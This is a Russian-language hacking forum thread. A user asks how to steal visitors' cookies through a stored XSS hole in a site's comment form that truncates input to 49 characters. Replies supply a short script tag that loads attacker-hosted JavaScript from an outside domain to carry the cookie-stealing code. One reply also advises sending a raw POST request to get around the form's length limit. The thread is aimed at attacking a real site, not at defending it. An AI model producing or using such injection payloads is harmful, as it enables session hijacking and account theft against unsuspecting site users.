49 символов для Xss атаки
 

Есть уязвимость на сайте: в форме комментариев можно вписать html теги. Как можно сформировать такой JavaScript, шоб своровать куки для формы в 49 символов (обрезаеться базой)?

http://forum.antichat.ru/thread25933.html

Green_Bear, да, это все понятно. У меня для формы доступно только 49 символов, я не могу ничего придумать, шоб как-нить сформировать рабочий код. (я в первом сообщении исправил про 49 символов)

<script src='http://site.ru/a.js'></script>

А в site.ru/a.js написать остальной код

А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли POST запрос, в самао скрипте редко длинна проверяеться!
а ваше смотри что те _Great_ написал! ;)

он же написал - базой.. а это хреново. Но моим способом уложиться можно

супер, ребята спасибо!!!!

не допер шото сам :(

_Great_
а у мня вопрос а если перед вставкой в бд например он проверяет кол-во символов поступающих получиться что он еще и посчитает все символы и с файла который вставляем ведь!Верно?

ну ты гонишь. ничего там не будет считать с файла.